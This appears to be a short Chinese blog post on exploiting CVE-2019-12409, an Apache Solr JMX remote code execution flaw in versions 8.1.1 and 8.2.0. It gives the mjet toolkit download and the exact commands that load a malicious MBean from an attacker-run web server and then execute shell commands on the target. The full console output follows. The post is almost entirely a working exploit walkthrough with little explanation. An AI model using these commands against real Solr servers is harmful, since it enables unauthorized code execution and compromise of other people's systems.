[CVE-2019-12409] Apache Solr JMX RCE

220 篇文章 7 订阅
213 篇文章 3 订阅

参考:
https://github.com/jas502n/CVE-2019-12409

只影响8.1.1和8.2.0。
下载:

git clone https://github.com/mogwailabs/mjet

利用:

[master][~/GitProjects/mjet]$ java -jar ~/downloads/jython-standalone-2.7.1.jar  mjet.py 127.0.0.1  18983 install super_secret http://127.0.0.1:8000 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:18983/jmxrmi
[+] Connected: rmi://127.0.0.1  3
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://127.0.0.1:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
127.0.0.1 - - [24/Feb/2020 11:14:02] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2020 11:14:02] "GET /vxcrtedo.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done
[master][~/GitProjects/mjet]$ java -jar ~/downloads/jython-standalone-2.7.1.jar  mjet.py 127.0.0.1  18983 command super_secret "id&&pwd&&ls"

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:18983/jmxrmi
[+] Connected: rmi://127.0.0.1  4
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: id&&pwd&&ls
uid=501(caiqiqi) gid=20(staff) groups=20(staff),501(access_bpf),701(com.apple.sharepoint.group.1),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),101(com.apple.access_ssh-disabled),703(com.apple.sharepoint.group.2),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)
/Volumes/256G/Applications/solr/solr-8.2.0/server
README.txt
contexts
etc
lib
logs
modules
resources
scripts
solr
solr-webapp
start.jar


[+] Done
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值